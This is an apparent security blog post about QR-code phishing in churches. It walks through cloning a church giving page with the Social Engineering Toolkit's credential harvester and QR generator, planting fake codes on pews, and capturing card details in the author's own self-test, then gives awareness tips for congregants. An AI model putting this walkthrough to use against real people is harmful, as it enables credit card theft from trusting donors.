Phishing in the Pews: The Hidden Dangers of QR Codes in Church Communities

21 May 2024

There I was sitting in the pews listening to the morning sermon. It was just a regular Sunday morning with my wife and I sitting and listening and my daughter trying to wiggle out of my arms. As the sermon drew to a close, I noticed the QR codes that were taped to the back of the chairs. The QR codes are used for attendees to learn more about the church and the programs they offer.

You can learn about the church and its members and give to the church. All you need to do is scan the QR code. As a cyber security professional….and someone who is always paranoid, I never scan a QR code no matter where it is. I know it’s no way to live but seeing me scan a QR code is like hearing the pope say a curse word.

An idea came to me as we bowed our heads in prayer. What if someone swapped out the church’s QR code with their own malicious QR code and stole credit card information? That is when I decided I was going to “Hack” the church…in theory anyway. “Father forgive me, for I have sinned.”

Understanding QR Codes

What are QR codes? A QR code (short for Quick Response code) is an array of black and white squares or pixels set in a grid that stores data for a machine to read. A smartphone or camera can quickly process the information contained in a QR code's specific arrangement of pixels, making it a convenient way to store and access data. Common uses in church settings (e.g., digital bulletins, online giving, event registration).

Phishing Basics

Phishing is a form of social engineering that involves communication via email, phone, or text requesting a user take action, such as navigating to a fake website. In both phishing and social engineering attacks, the collected information is used in order to gain unauthorized access to protected accounts or data.

How QR Code Phishing Works

QR code phishing works just like any other phishing attack, but QR codes are more convenient, and there isn’t usually a link to look at. They are also more versatile and can be implemented anywhere around the world. You can find them on your favorite TV shows, commercials, news stations, businesses, and churches. Why would church communities be an attractive target—trusting environment?

There are often less tech-savvy individuals and a potential for high-value donations. There also isn’t any form of validation on the back of the pews that indicate the QR codes are the legitimate QR codes….Unless you scan one and find out for yourself. If this scenario was a plausible one, how would a cybercriminal achieve it? Have your communion juice and crackers, there will be a lot to confess later.

Unholy Intention

If a cybercriminal wanted to conduct a QR code phishing attack on a church, the first item they would need to do is reconnaissance and what the tactic would be. In this case, we will use a QR code phishing attack and attempt to steal credit card information. To be successful, they would need to research the church and what church members do when they give donations.

For this attack, the cybercriminal will do the following to orchestrate the attack.

  • Reconnaissance on how the church receives donations.
  • Clone the church website and the portion for giving.
  • Buy a domain that is similar to the church domain and host it on a VPS environment.
  • Write code to direct the payments to the cybercriminal.
  • Test.
  • Attend church, and place QR codes on the back of the pews.
  • Wait and capture the credit card information.
  • Buy enough grace to get out of HELL….

“Abandon All Hope, Ye Who Enter Here”

After concluding the reconnaissance portion of the attack, the cybercriminal would locate the church’s website and clone it for the attack. This will assist in persuading the church members to proceed further after they scan the QR code at church. The idea is to keep the church members from suspecting that the website they are visiting is malicious. Cloning the actual website helps aid in the attack because we, as humans, seldom look at the URL portion.

To begin the attack, we look to a tool known as the “Social Engineering Toolkit” or “SET.” The Social Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the launch and has quickly become a standard tool in a penetration tester’s arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset.

The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

“Social Engineering Toolkit” or “SET”

To clone a website using SET is easy. With SET, we need to go through a few options before we can clone the website. Once we have SET running, we will need the following options:

  • Select option 1 for Social-Engineering Attacks.

  • Select Website Attack Vectors

  • Select Credential Harvester Attack Method.

“Social Engineering Toolkit” menu

The next menu will ask you which method you want to choose to harvest a victim’s credentials. In this example, we will be cloning the church’s website, so choose option 2.

SET Site cloner

SET will ask you for your IP address so that it can send the POST requests from the cloned website back to your machine. Once you tell SET that you would like to clone a website, it will then ask you for the URL of the site you wish to clone.

SET Site cloner

Once the URL is entered, SET will clone the site and display all the POST requests of the site back to this terminal. It is now time to navigate to the cloned site.

SET Site cloner

Now it’s time to focus on the creation of the QR Code that would redirect the users to our fake website. There are many websites available on the Internet that allow you to create QR Codes, but the Social Engineering Toolkit can also generate a QR Code for us. The process is very easy; we just select option 9 which is the QRCode Generator Attack Vector.

QRCode Generator Attack Vector

SET will ask for a URL that will redirect the users that will scan this QR Code. We will use the URL as our IP address because we have set up the listener at this address.

SET Site cloner

There are many ways that you can deliver a QR Code, but we are going to stick it on the back of a pew at church and ask for forgiveness later.

Sweating Like a Sinner in Church

I said a prayer as we were sitting in the pews and placed the QR code. It was only for me to scan of course, and we were just testing a theory. I do not need more marks against me to get into the “Pearly gates.” I took a deep breath and scanned the QR code. I was presented with the cloned website that I created.

Cloned website

I then clicked on the give section, and it brought up the input portion for the signup to give to the church.

Input portion of fake website

I slowly inputted all the information into the sections and clicked submit. I then waited to see if any information was captured. This was made possible due to the fact that when you access the fake website I created, it operates on port 80 which is all clear text communications.

Give section

After waiting just a few moments, I checked my computer to see if any requests had been sent. As I looked down, I could see that the requests that had been made with the credit card had been captured successfully. The attack worked with a fake QR code and cloned a fake website.

Captured credit card information

From Sinner to Saint

The attack was alarming to me, but that is because I am a cyber security professional and know how attacks work. To the average church member, being instructed by the pastor to scan the QR code if you wanted to give, they wouldn’t question it. That is where the issue with QR codes lies. What can a person who attends church do when it comes to QR codes? Allow me to show you to the promised land.

  • Use the app to give instead of scanning QR codes.

  • Use the actual website to give to the church.

  • If you do scan a QR code, make sure to analyze the URL section of the website. It should be spelled correctly without extra words or symbols used to fool you.

  • If you scan a QR code, always check for items that look suspicious. Your browser should always have an “HTTPS” when open and sometimes a company will use a third party for the transaction, like Stripe or PayPal.

The continued use of QR codes has many risks. and some that outweigh security. People enjoy the easy access that a QR code brings. People do not need to do much other than scan and enjoy whatever comes next. What if what comes next comes at the expense of your bank account that may ruin your life for a while? As Jesus once said, “I send you out, sheep amongst wolves.”